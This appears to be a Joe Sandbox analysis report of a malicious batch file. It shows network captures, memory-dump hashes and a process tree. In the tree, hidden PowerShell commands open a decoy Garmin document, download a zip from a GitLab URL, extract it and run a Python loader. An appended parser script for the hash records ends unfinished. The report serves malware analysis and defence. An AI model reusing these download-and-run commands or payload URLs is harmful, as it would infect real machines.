Data Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
2024-12-19 13:13:32 UTC | 498 bytes | IN
Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 72 46 6b 79 35 75 4f 34 31 4a 63 37 78 4f 35 56 7a 68 34 52 58 67 71 6c 71 44 52 61 58 75 44 6b 51 4b 31 57 76 5a 4f 65 32 74 78 51 6b 6b 47 77 4a 6e 76 25 32 42 4b 61 49 67 46 47 6e 43 42 39 5a 7a 72 6e 25 32 46 43 4e 59 57 6a 50 4a 61 44 53 4f 79 59 38 53 47 71 36 36 45 76 5a 45 41 34 64 36 41 6c 59 5a 55 55 56 61 69 70 51 47 6a 66 4e 37 50 31 75 49 71 4c 35 45 6c 65 42 32 6f 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22
Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rFky5uO41Jc7xO5Vzh4RXgqlqDRaXuDkQK1WvZOe2txQkkGwJnv%2BKaIgFGnCB9Zzrn%2FCNYWjPJaDSOyY8SGq66EvZEA4d6AlYZUUVaipQGjfN7P1uIqL5EleB2o%3D"}],"group":"cf-nel","max_age":604800}NEL: {"
2024-12-19 13:13:32 UTC | 104 bytes | IN
Data Raw: 36 32 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 75 73 65 72 73 2f 73 69 67 6e 5f 69 6e 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: 62<html><body>You are being <a href="https://gitlab.com/users/sign_in">redirected</a>.</body></html>
2024-12-19 13:13:32 UTC | 5 bytes | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 1
Start time: 08:13:18
Start date: 19/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngadsfkgj17.bat" "
Imagebase: 0x7ff7b93c0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 2
Start time: 08:13:18
Start date: 19/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 3
Start time: 08:13:19
Start date: 19/12/2024
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp.com 437
Imagebase: 0x7ff7ea530000
File size: 14'848 bytes
MD5 hash: 33395C4732A49065EA72590B14B64F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 08:13:19
Start date: 19/12/2024
Path: C:\Windows\System32\find.exe
Wow64 process (32bit): false
Commandline: find
Imagebase: 0x7ff782cc0000
File size: 17'920 bytes
MD5 hash: 4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 5
Start time: 08:13:19
Start date: 19/12/2024
Path: C:\Windows\System32\findstr.exe
Wow64 process (32bit): false
Commandline: findstr /L /I set "C:\Users\user\Desktop\hngadsfkgj17.bat"
Imagebase: 0x7ff796ca0000
File size: 36'352 bytes
MD5 hash: 804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 08:13:19
Start date: 19/12/2024
Path: C:\Windows\System32\findstr.exe
Wow64 process (32bit): false
Commandline: findstr /L /I goto "C:\Users\user\Desktop\hngadsfkgj17.bat"
Imagebase: 0x7ff796ca0000
File size: 36'352 bytes
MD5 hash: 804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                          Start time:08:13:20
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:findstr /L /I echo "C:\Users\user\Desktop\hngadsfkgj17.bat"
                                                                                                                                                                                                                          Imagebase:0x7ff796ca0000
                                                                                                                                                                                                                          File size:36'352 bytes
                                                                                                                                                                                                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                          Start time:08:13:20
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:findstr /L /I pause "C:\Users\user\Desktop\hngadsfkgj17.bat"
                                                                                                                                                                                                                          Imagebase:0x7ff796ca0000
                                                                                                                                                                                                                          File size:36'352 bytes
                                                                                                                                                                                                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                          Start time:08:13:20
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                                          Imagebase:0x7ff7b93c0000
                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                          Start time:08:13:20
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:find
                                                                                                                                                                                                                          Imagebase:0x7ff782cc0000
                                                                                                                                                                                                                          File size:17'920 bytes
                                                                                                                                                                                                                          MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                          Start time:08:13:20
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                                          Imagebase:0x7ff7b93c0000
                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                          Start time:08:13:20
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
                                                                                                                                                                                                                          Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                          Start time:08:13:28
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"
                                                                                                                                                                                                                          Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                          Start time:08:13:29
                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
                                                                                                                                                                                                                          Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:08:13:40
Start date:19/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
Imagebase:0x7ff6e3d50000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:08:13:52
Start date:19/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"
Imagebase:0x7ff66e660000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Strings
Memory Dump Source
• Source File: 0000000C.00000002.2309227175.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffd345a0000_powershell.jbxd
Similarity
• API ID:
• String ID: .A_H$plq4
• API String ID: 0-1991784877
• Opcode ID: b30be7068b30f17b88ca4f748f4a44a7348d952028daf90923f582c14a2ca3dd
• Instruction ID: ed39fc17d576b690a79b5749564852cc60c959f4c681e9f1699479fa1f3d7a76
• Opcode Fuzzy Hash: b30be7068b30f17b88ca4f748f4a44a7348d952028daf90923f582c14a2ca3dd
• Instruction Fuzzy Hash: 58F12322E1EBC91FE7979B2858A51A53FE1EF57324F0801FBD589C70E3D919A805C352
Memory Dump Source
• Source File: 0000000C.00000002.2309227175.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffd345a0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 66be9c733ebdb4021b55b99784d1639a9f5c314d4a12d1c8fd98d528e28670bb
• Instruction ID: 3890f0c2110f0c38518be42318446b7a792cd89f5ee5f052636b05da156dc41a
• Opcode Fuzzy Hash: 66be9c733ebdb4021b55b99784d1639a9f5c314d4a12d1c8fd98d528e28670bb
• Instruction Fuzzy Hash: 41110471F0E6884FEB93DB6854A0568BBE1EF2A314B1801BED94DD71C3DA29A844C311
Memory Dump Source
• Source File: 0000000C.00000002.2309227175.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffd345a0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 22ef35254ddc083b5fa6993006692d69ee041f28d3af76c4f7ce67c55e3313a7
• Instruction ID: e42063bdea366a251b3458220c9bfc358f5f7a46f7deb7dd177f045c42c16c60
• Opcode Fuzzy Hash: 22ef35254ddc083b5fa6993006692d69ee041f28d3af76c4f7ce67c55e3313a7
• Instruction Fuzzy Hash: 2601B932F1EA4A4FE7DAAA5C64A517CB3D1EF8625575400BEE15DC21D3DD2EAC059200
Memory Dump Source
• Source File: 0000000C.00000002.2308909075.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffd344d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
• Instruction ID: 90dfc4b8dc236ae19ed9faf4eae3c8d71998030ea7d500346e8466edc6007268
• Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
• Instruction Fuzzy Hash: 7601A73020CB0C4FD744EF0CE051AA9B3E0FB99324F10052DE58AC36A5D736E882CB45
Memory Dump Source
• Source File: 0000000C.00000002.2308909075.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffd344d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7e8a0190fb266865bc4c27be335c17dbccd4d243fa830f814f5ef0afea98be33
• Instruction ID: a1d315288ebc282f36624e45d4edfb597a2c07f8c34518d72a2dde916b0b75b5
• Opcode Fuzzy Hash: 7e8a0190fb266865bc4c27be335c17dbccd4d243fa830f814f5ef0afea98be33
• Instruction Fuzzy Hash: 29B1E653B0F6965BE751B66C68F92E63FE0EF53224B0A02F7C1C8CA0A7DD5C68069351
Memory Dump Source
• Source File: 0000000E.00000002.2425573537.00007FFD34590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd34590000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 33c3e77be9e0f203a77bbc2b0596e5f84054978ab4b7410c1657c1f780cf179b
• Instruction ID: c81d1f3e72e9002cb09ab66aa0ff58882021c16b2c146b0cec2a158c6f268e65
• Opcode Fuzzy Hash: 33c3e77be9e0f203a77bbc2b0596e5f84054978ab4b7410c1657c1f780cf179b
• Instruction Fuzzy Hash: 92B10F23E0EBC90FE757962858B61A47FF1EF87620B0805EFD189CB0A3D9196846D352
Memory Dump Source
• Source File: 0000000E.00000002.2425573537.00007FFD34590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd34590000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: daa598a1c8a8347885540fe56fd6f3f97283270656e7efdb3f0e1f7bb122ed85
• Instruction ID: 03ab3a2eea50a5602e38b3059871b54b49a4a1359901233e6e9137d57c99115d
• Opcode Fuzzy Hash: daa598a1c8a8347885540fe56fd6f3f97283270656e7efdb3f0e1f7bb122ed85
• Instruction Fuzzy Hash: 0501B932F0DA464FE79AA65C64A517C73E2EF8675575404BAE14DC2593DE2DAC019200
Memory Dump Source
• Source File: 0000000E.00000002.2424933577.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd344c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
• Instruction ID: c5d6333bad849b6d43603653fee89adb54aa6a76a37498d0eb7699023f4e6eda
• Opcode Fuzzy Hash: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
• Instruction Fuzzy Hash: 5501A73020CB0C4FD744EF0CE051AA5B3E0FB95324F10052DE58AC36A5DB36E881CB45
Memory Dump Source
• Source File: 0000000E.00000002.2425573537.00007FFD34590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd34590000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                            • Opcode ID: 5874ed30099697d4483c4a450b2456c463ed7d0e4eb121c4f8c11ba54552f61e
                                                                                                                                                                                                                            • Instruction ID: 0d6f93d92d415dea7b28e44fa4630ca0b4e4a01bbd439c9a64aea2f6f1e159ae
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5874ed30099697d4483c4a450b2456c463ed7d0e4eb121c4f8c11ba54552f61e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEF0E532F0E6884FEB56EBBC54A01E8BBA0EB5A260F1801BFE14DD7183D8399845C351
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000010.00000002.2549943107.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffd345a0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: f1e77cb12180917c9d877d173c509d00261be4f936bd61db1c851b98dad3488d
                                                                                                                                                                                                                            • Instruction ID: 7794ba6e12d6c5e507c65efee29feaeaaa203a2390849d435b64f44e9f9450ae
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f1e77cb12180917c9d877d173c509d00261be4f936bd61db1c851b98dad3488d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09D1F422F1E7CA0FE7979B6858A51A47FE1EF57720B0801FBD189C71E3D91DA8468342
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000010.00000002.2549159352.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffd344d0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 1c64f9c5ef59eac1480721a5499d6725b5c7ba8f446b9e7c3bda3e560e9f4e45
                                                                                                                                                                                                                            • Instruction ID: 59679e0dbbaa582bf65157c9f2be697c0ecd99dfd55d1364643391f7701e1671
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c64f9c5ef59eac1480721a5499d6725b5c7ba8f446b9e7c3bda3e560e9f4e45
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C019272B0CA180BE758994C78561BCB3D1E79A621F05023FE18EC3286DE69A8035286
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000010.00000002.2549159352.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffd344d0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 4598ee3edf00ac0262d4078ae0fd92dfcf1591089475b79ae25ed7997e5de700
                                                                                                                                                                                                                            • Instruction ID: 6e8e90b878b8f591fd7fab9b6867498902cfc9b97a3a0d2a42dc112b06612460
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4598ee3edf00ac0262d4078ae0fd92dfcf1591089475b79ae25ed7997e5de700
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE019672B0CA180BE75C594C74521BC73D1E79A721F05027FE58EC3286DE5968435186
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000010.00000002.2549159352.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffd344d0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: a4442f86807928f54d37bcaaa4a5c521911d7acc26ff0cad7c0581ad2170df57
                                                                                                                                                                                                                            • Instruction ID: 31bf03a6402a69ce00e0ae189dd89edb4ded382b1448f8ad9b7bf1a7ad821831
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4442f86807928f54d37bcaaa4a5c521911d7acc26ff0cad7c0581ad2170df57
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A017572B0CA1C0BD75C594C78561B8B3D1E79A625F05037FE18ED3286DE29A8035686
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000010.00000002.2549943107.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffd345a0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 857432b7e91651cb8bf4b3a04837c7f186b9df249b2e98746e091a1cd5bd4c52
                                                                                                                                                                                                                            • Instruction ID: 75edc4bb2b5ba02b0f82c779ee1cfc2b669ea91ed0eac22859b18707011e1145
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 857432b7e91651cb8bf4b3a04837c7f186b9df249b2e98746e091a1cd5bd4c52
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11110821F0E7894FE7A7DA9850A81687BE1EF6A318B1401FED94DDB1C3DA2DA8048311
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000010.00000002.2549159352.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffd344d0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                            • Instruction ID: f7f444066b098512b727a9001cb1ad15401c1905bfe25d9c57a8f0291b04063f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC01A73020CB0C4FD744EF0CE051AA5B3E0FB85324F10052DE58AC3661DB36E882CB45
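The function records above are the report's raw per-function similarity data: each "Memory Dump Source" block names the process dump (the leading 8 hex digits of the .sdmp name are the PID, 0x10 = 16 for the powershell snapshot) and each "Similarity" block carries the opcode and instruction fuzzy hashes that Joe Sandbox uses to match functions. The following Python parser is an added example, not part of the Joe Sandbox report: it turns records in this layout into structured objects and flags instruction fuzzy hashes that agree at most hex positions. The sample text is three records copied from the listing above; the positional comparison is an assumed heuristic, because the page does not document the fuzzy-hash format, and a real pivot would use the hash family's own comparison routine.

```python
"""Parse Joe Sandbox per-function 'Memory Dump Source' / 'Similarity' records
and flag instruction fuzzy hashes that are near-identical (likely the same
function recurring in a dump). Added example; not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from itertools import combinations

# Sample input: three records copied verbatim, in the report's own layout,
# from the function listing on this page.
SAMPLE = """
Memory Dump Source
• Source File: 0000000E.00000002.2425573537.00007FFD34590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd34590000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5874ed30099697d4483c4a450b2456c463ed7d0e4eb121c4f8c11ba54552f61e
• Instruction ID: 0d6f93d92d415dea7b28e44fa4630ca0b4e4a01bbd439c9a64aea2f6f1e159ae
• Opcode Fuzzy Hash: 5874ed30099697d4483c4a450b2456c463ed7d0e4eb121c4f8c11ba54552f61e
• Instruction Fuzzy Hash: FEF0E532F0E6884FEB56EBBC54A01E8BBA0EB5A260F1801BFE14DD7183D8399845C351
Memory Dump Source
• Source File: 00000010.00000002.2549159352.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
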